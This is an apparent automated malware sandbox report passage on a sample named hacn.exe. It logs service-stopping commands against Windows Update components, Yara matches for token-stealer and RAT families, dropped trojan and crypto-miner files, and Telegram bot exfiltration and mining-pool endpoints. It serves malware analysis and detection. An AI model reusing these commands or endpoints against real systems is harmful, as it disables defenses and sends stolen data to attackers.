Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\dialer.exe

Code function: 17_2_00007FF65A131B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

17_2_00007FF65A131B54

Source: C:\Users\user\Desktop\hacn.exe

Code function: 0_2_00007FF61D32C560 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF61D32C560

Source: C:\Users\user\Desktop\hacn.exe

Code function: 0_2_00007FF61D346470 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF61D346470

Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe

Code function: 4_2_000EB146 GetVersionExW,

4_2_000EB146

Source: C:\Users\user\Desktop\hacn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Stops critical windows services

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc

Stealing of Sensitive Information

Yara detected Discord Token Stealer

Source: Yara match	File source: 5.0.main.exe.244178405b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.main.exe.244176d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.main.exe.244176def04.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 7748, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED

Yara detected Millenuim RAT

Source: Yara match	File source: 5.0.main.exe.244178405b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.main.exe.244176d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.main.exe.244176def04.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 7748, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 5.0.main.exe.244178405b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.main.exe.244176d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.main.exe.244176def04.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 7748, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED

Remote Access Functionality

Yara detected Discord Token Stealer

Source: Yara match	File source: 5.0.main.exe.244178405b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.main.exe.244176d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.main.exe.244176def04.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 7748, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED

Yara detected Millenuim RAT

Source: Yara match	File source: 5.0.main.exe.244178405b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.main.exe.244176d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.main.exe.244176def04.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 7748, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 5.0.main.exe.244178405b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.main.exe.244176d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.main.exe.244176def04.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 7748, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED

Source: C:\ProgramData\main.exe

5_2_00007FFDF7CF1120

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	131 Windows Management Instrumentation	1 Scripting	11 DLL Side-Loading	21 Disable or Modify Tools	1 Credential API Hooking	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	11 DLL Side-Loading	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	1 Input Capture	2 File and Directory Discovery	Remote Desktop Protocol	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	11 Windows Service	11 Windows Service	2 Obfuscated Files or Information	Security Account Manager	56 System Information Discovery	SMB/Windows Admin Shares	1 Credential API Hooking	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Service Execution	Login Hook	813 Process Injection	11 Software Packing	NTDS	551 Security Software Discovery	Distributed Component Object Model	1 Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	3 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 DLL Side-Loading	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	4 Rootkit	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Masquerading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	251 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	813 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Hidden Files and Directories	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
hacn.exe	47%	ReversingLabs	Win64.Trojan.Generic
hacn.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	100%	Avira	RKIT/Agent.diumn
C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	100%	Joe Sandbox ML
C:\Windows\Temp\wxyubnjmnlae.tmp	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	100%	Joe Sandbox ML
C:\ProgramData\main.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	100%	Joe Sandbox ML
C:\ProgramData\setup.exe	100%	Joe Sandbox ML
C:\ProgramData\main.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75722\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75722\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75722\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75722\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75722\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75722\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75722\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75722\python310.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	21%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75722\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75722\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	92%	ReversingLabs	Win64.Trojan.SilentCryptoMiner
C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Windows\Temp\gqxqtdeqxchk.sys	5%	ReversingLabs
C:\Windows\Temp\wxyubnjmnlae.tmp	55%	ReversingLabs	Win64.Trojan.Generic

Source	Detection	Scanner	Label
http://cacerts.digicert.co	0%	URL Reputation	safe
https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt-	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
raw.githubusercontent.com	185.199.111.133	true	false	unknown
ip-api.com	208.95.112.1	true	false	high
pool.hashvault.pro	142.202.242.45	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt	false	Avira URL Cloud: safe	unknown
http://ip-api.com/json/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	hacn.exe, 00000001.00000002.1665413675.000001E4E5D7C000.00000004.00001000.00020000.00000000.sdmp	false		high
http://cacerts.digicert.co	hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://raw.githubusercontent.com	main.exe, 00000005.00000002.1756028190.000002441A6B3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.python.org/download/releases/2.3/mro/.	hacn.exe, 00000001.00000002.1665862675.000001E4E65E8000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	hacn.exe, 00000001.00000003.1656455258.000001E4E4505000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663171779.000001E4E44D5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663107087.000001E4E4530000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1664004818.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663028720.000001E4E4527000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000002.1665270780.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654402774.000001E4E4534000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654233604.000001E4E4532000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662960755.000001E4E4523000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663139978.000001E4E44C5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662672451.000001E4E451F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ip-api.com	main.exe, 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.python.org/dev/peps/pep-0205/	hacn.exe, 00000000.00000003.1644672626.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1656605563.000001E4E64DA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://python.org/dev/peps/pep-0263/	hacn.exe, 00000001.00000002.1666681967.00007FFDFB78F000.00000002.00000001.01000000.00000004.sdmp	false		high
https://api.telegram.org/file/bot	main.exe, 00000005.00000002.1775219173.00000244324E6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	false		high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	hacn.exe, 00000001.00000003.1656455258.000001E4E4505000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663171779.000001E4E44D5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663107087.000001E4E4530000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1664004818.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663028720.000001E4E4527000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000002.1665270780.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654402774.000001E4E4534000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654233604.000001E4E4532000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662960755.000001E4E4523000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663139978.000001E4E44C5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662672451.000001E4E451F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.sqlite.org/copyright.html2	s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	false		high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	hacn.exe, 00000001.00000003.1662672451.000001E4E451F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://system.data.sqlite.org/	s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	main.exe, 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt-	main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot-/sendDocument?chat_id=	main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	false		high
